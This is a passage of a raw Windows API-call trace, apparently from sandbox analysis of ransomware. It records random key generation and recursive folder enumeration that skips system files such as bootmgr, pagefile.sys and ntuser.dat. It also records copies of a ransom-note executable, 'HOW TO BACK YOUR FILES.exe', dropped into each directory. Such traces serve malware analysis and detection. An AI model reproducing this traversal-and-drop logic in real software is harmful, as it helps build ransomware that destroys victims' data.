CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.684] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.684] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.684] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0083.689] CloseHandle (hObject=0x15c) returned 1 [0083.689] CloseHandle (hObject=0x118) returned 1 [0083.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0083.689] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.692] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea12c467, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xea12c467, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xea1525c5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x7e148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WelcomeScan.jpg", cAlternateFileName="")) returned 0 [0083.692] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.692] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0083.692] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0083.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2100 | out: hHeap=0x2b0000) returned 1 [0083.692] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0083.692] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned 45 [0083.692] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax" [0083.692] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.692] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.693] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.693] GetLastError () returned 0x0 [0083.693] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.693] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.693] CloseHandle (hObject=0x120) returned 1 [0083.693] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.693] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.693] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.693] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.693] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.693] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.693] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.693] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0083.693] lstrcmpiW (lpString1="ActivityLog", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="aoldtz.exe") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2=".") returned 1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="..") returned 1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="windows") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="bootmgr") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="temp") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="pagefile.sys") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="boot") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="ids.txt") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="ntuser.dat") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="perflogs") returned -1 [0083.694] lstrcmpiW (lpString1="ActivityLog", lpString2="MSBuild") returned -1 [0083.694] lstrlenW (lpString="ActivityLog") returned 11 [0083.694] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\*") returned 47 [0083.694] lstrcpyW (in: lpString1=0x2cce45c, lpString2="ActivityLog" | out: lpString1="ActivityLog") returned="ActivityLog" [0083.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0083.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1608 [0083.694] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0083.694] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common Coverpages", cAlternateFileName="COMMON~1")) returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="aoldtz.exe") returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2=".") returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="..") returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="windows") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="bootmgr") returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="temp") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="pagefile.sys") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="boot") returned 1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="ids.txt") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="ntuser.dat") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="perflogs") returned -1 [0083.694] lstrcmpiW (lpString1="Common Coverpages", lpString2="MSBuild") returned -1 [0083.694] lstrlenW (lpString="Common Coverpages") returned 17 [0083.694] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0083.694] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Common Coverpages" | out: lpString1="Common Coverpages") returned="Common Coverpages" [0083.694] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0083.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x80) returned 0x2f0518 [0083.695] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0083.695] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c33bee0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.695] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.695] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Inbox", cAlternateFileName="")) returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="aoldtz.exe") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2=".") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="..") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="windows") returned -1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="bootmgr") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="temp") returned -1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="pagefile.sys") returned -1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="boot") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="ids.txt") returned 1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="ntuser.dat") returned -1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="perflogs") returned -1 [0083.695] lstrcmpiW (lpString1="Inbox", lpString2="MSBuild") returned -1 [0083.695] lstrlenW (lpString="Inbox") returned 5 [0083.695] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0083.695] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Inbox" | out: lpString1="Inbox") returned="Inbox" [0083.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0083.695] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4780 [0083.695] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0083.695] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Queue", cAlternateFileName="")) returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="aoldtz.exe") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2=".") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="..") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="windows") returned -1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="bootmgr") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="temp") returned -1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="pagefile.sys") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="boot") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="ids.txt") returned 1 [0083.695] lstrcmpiW (lpString1="Queue", lpString2="ntuser.dat") returned 1 [0083.696] lstrcmpiW (lpString1="Queue", lpString2="perflogs") returned 1 [0083.696] lstrcmpiW (lpString1="Queue", lpString2="MSBuild") returned 1 [0083.696] lstrlenW (lpString="Queue") returned 5 [0083.696] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned 51 [0083.696] lstrcpyW (in: lpString1=0x2cce45c, lpString2="Queue" | out: lpString1="Queue") returned="Queue" [0083.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0083.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e47f0 [0083.696] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0083.696] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SentItems", cAlternateFileName="SENTIT~1")) returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="aoldtz.exe") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2=".") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="..") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="windows") returned -1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="bootmgr") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="temp") returned -1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="pagefile.sys") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="boot") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="ids.txt") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="ntuser.dat") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="perflogs") returned 1 [0083.696] lstrcmpiW (lpString1="SentItems", lpString2="MSBuild") returned 1 [0083.696] lstrlenW (lpString="SentItems") returned 9 [0083.696] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Queue") returned 51 [0083.696] lstrcpyW (in: lpString1=0x2cce45c, lpString2="SentItems" | out: lpString1="SentItems") returned="SentItems" [0083.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0083.696] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2d2ef0 [0083.696] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0083.696] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="aoldtz.exe") returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2=".") returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="..") returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="windows") returned -1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="bootmgr") returned 1 [0083.696] lstrcmpiW (lpString1="VirtualInbox", lpString2="temp") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="pagefile.sys") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="boot") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="ids.txt") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="ntuser.dat") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="perflogs") returned 1 [0083.697] lstrcmpiW (lpString1="VirtualInbox", lpString2="MSBuild") returned 1 [0083.697] lstrlenW (lpString="VirtualInbox") returned 12 [0083.697] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\SentItems") returned 55 [0083.697] lstrcpyW (in: lpString1=0x2cce45c, lpString2="VirtualInbox" | out: lpString1="VirtualInbox") returned="VirtualInbox" [0083.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0083.697] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1408 [0083.697] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0083.697] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualInbox", cAlternateFileName="VIRTUA~1")) returned 0 [0083.697] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.697] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0083.697] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0083.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0083.697] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0083.697] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned 58 [0083.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0083.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.697] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.698] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.698] GetLastError () returned 0x0 [0083.698] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.698] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.698] CloseHandle (hObject=0x120) returned 1 [0083.698] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.698] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.698] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.698] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.698] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.698] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.698] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.698] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.698] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.698] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.698] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.698] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0083.699] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0083.699] lstrcmpiW 